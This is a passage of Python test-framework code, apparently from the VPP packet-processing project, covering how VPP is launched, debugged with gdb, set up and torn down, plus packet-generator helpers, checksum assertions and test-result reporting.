cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@staticmethod
def get_least_used_cpu():
cpu_usage_list = [set(range(psutil.cpu_count()))]
vpp_processes = [p for p in psutil.process_iter(attrs=['pid', 'name'])
if 'vpp_main' == p.info['name']]
for vpp_process in vpp_processes:
for cpu_usage_set in cpu_usage_list:
try:
cpu_num = vpp_process.cpu_num()
if cpu_num in cpu_usage_set:
cpu_usage_set_index = cpu_usage_list.index(
cpu_usage_set)
if cpu_usage_set_index == len(cpu_usage_list) - 1:
cpu_usage_list.append({cpu_num})
else:
cpu_usage_list[cpu_usage_set_index + 1].add(
cpu_num)
cpu_usage_set.remove(cpu_num)
break
except psutil.NoSuchProcess:
pass
for cpu_usage_set in cpu_usage_list:
if len(cpu_usage_set) > 0:
min_usage_set = cpu_usage_set
break
return random.choice(tuple(min_usage_set))
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = BoolEnvironmentVariable('STEP')
d = os.getenv("DEBUG", None)
# inverted case to handle '' == True
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.set_debug_flags(d)
cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
cpu_core_number = cls.get_least_used_cpu()
if not hasattr(cls, "worker_config"):
cls.worker_config = ""
default_variant = os.getenv("VARIANT")
if default_variant is not None:
default_variant = "defaults { %s 100 }" % default_variant
else:
default_variant = ""
api_fuzzing = os.getenv("API_FUZZ")
if api_fuzzing is None:
api_fuzzing = 'off'
cls.vpp_cmdline = [cls.vpp_bin, "unix",
"{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}", "api-segment", "{",
"prefix", cls.shm_prefix, "}", "cpu", "{",
"main-core", str(cpu_core_number),
cls.worker_config, "}",
"physmem", "{", "max-size", "32m", "}",
"statseg", "{", "socket-name", cls.stats_sock, "}",
"socksvr", "{", "socket-name", cls.api_sock, "}",
"node { ", default_variant, "}",
"api-fuzz {", api_fuzzing, "}",
"plugins",
"{", "plugin", "dpdk_plugin.so", "{", "disable",
"}", "plugin", "rdma_plugin.so", "{", "disable",
"}", "plugin", "unittest_plugin.so", "{", "enable",
"}"] + cls.extra_vpp_plugin_config + ["}", ]
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
if cls.test_plugin_path is not None:
cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug VPP using:")
if cls.debug_gdbserver:
print("sudo gdb " + cls.vpp_bin +
" -ex 'target remote localhost:{port}'"
.format(port=cls.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def run_vpp(cls):
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or \
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
gc.collect() # run garbage collection first
cls.logger = get_logger(cls.__name__)
seed = os.environ["RND_SEED"]
random.seed(seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
cls.tempdir = tempfile.mkdtemp(
prefix='vpp-unittest-%s-' % cls.__name__)
cls.stats_sock = "%s/stats.sock" % cls.tempdir
cls.api_sock = "%s/api.sock" % cls.tempdir
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" %
cls.__name__)
cls.shm_prefix = os.path.basename(cls.tempdir)
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, shm prefix is %s",
cls.tempdir, cls.shm_prefix)
cls.logger.debug("Random seed is %s" % seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._captures = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver:
cls.vapi_response_timeout = 0
cls.vapi = VppPapiProvider(cls.shm_prefix, cls.shm_prefix, cls,
cls.vapi_response_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.statistics = VPPStats(socketname=cls.stats_sock)
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except vpp_papi.VPPIOError as e:
cls.logger.debug("Exception connecting to vapi: %s" % e)
cls.vapi.disconnect()
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise
except vpp_papi.VPPRuntimeError as e:
cls.logger.debug("%s" % e)
cls.quit()
raise
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
cls._debug_quit()
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug(cls.vapi.vpp.get_stats())
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
vpp_api_trace_log))
except VppTransportShmemIOError:
self.logger.debug("VppTransportShmemIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_capture(cls, cap_name):
""" Register a capture in the testclass """
# add to the list of captures with current timestamp
cls._captures.append((time.time(), cap_name))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls):
""" Enable the PG, wait till it is done, then clean up """
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
# PG, when starts, runs to completion -
# so let's avoid a race condition,
# and wait a little till it's done.
# Then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for stamp, cap_name in cls._captures:
cls.vapi.cli('packet-generator delete %s' % cap_name)
cls._captures = []
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = getattr(payload, payload_field).split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
layer = layer.copy()
layer.remove_payload()
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(temp.getlayer(counter), cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_packet_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_packet_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics.get_err_counter(counter)
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def pg_send(self, intf, pkts, worker=None):
self.vapi.cli("clear trace")
intf.add_stream(pkts, worker=worker)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
self.pg_send(intf, pkts)
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None):
if not n_rx:
n_rx = len(pkts)
self.pg_send(intf, pkts, worker=worker)
rx = output.get_capture(n_rx)
return rx
def send_and_expect_only(self, intf, pkts, output, timeout=None):
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured()
timeout = 0.1
return rx
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
:param stream File descriptor to store where to report test results.
Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = os.getenv('FAILED_DIR')
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
test_doc = getdoc(test)
if not test_doc:
raise Exception("No doc string for test '%s'" % test.id())
test_title = test_doc.splitlines()[0]
test_title_colored = colorize(test_title, GREEN)
if test.force_solo():
# long live PEP-8 and 80 char width limitation...
c = YELLOW
test_title_colored = colorize("SOLO RUN: " + test_title, c)
if not hasattr(test.__class__, '_header_printed'):
print(double_line_delim)
print(test_title_colored)
print(double_line_delim)
test.__class__._header_printed = True
print_header(test)
self.start_test = time.time()
unittest.TestResult.startTest(self, test)
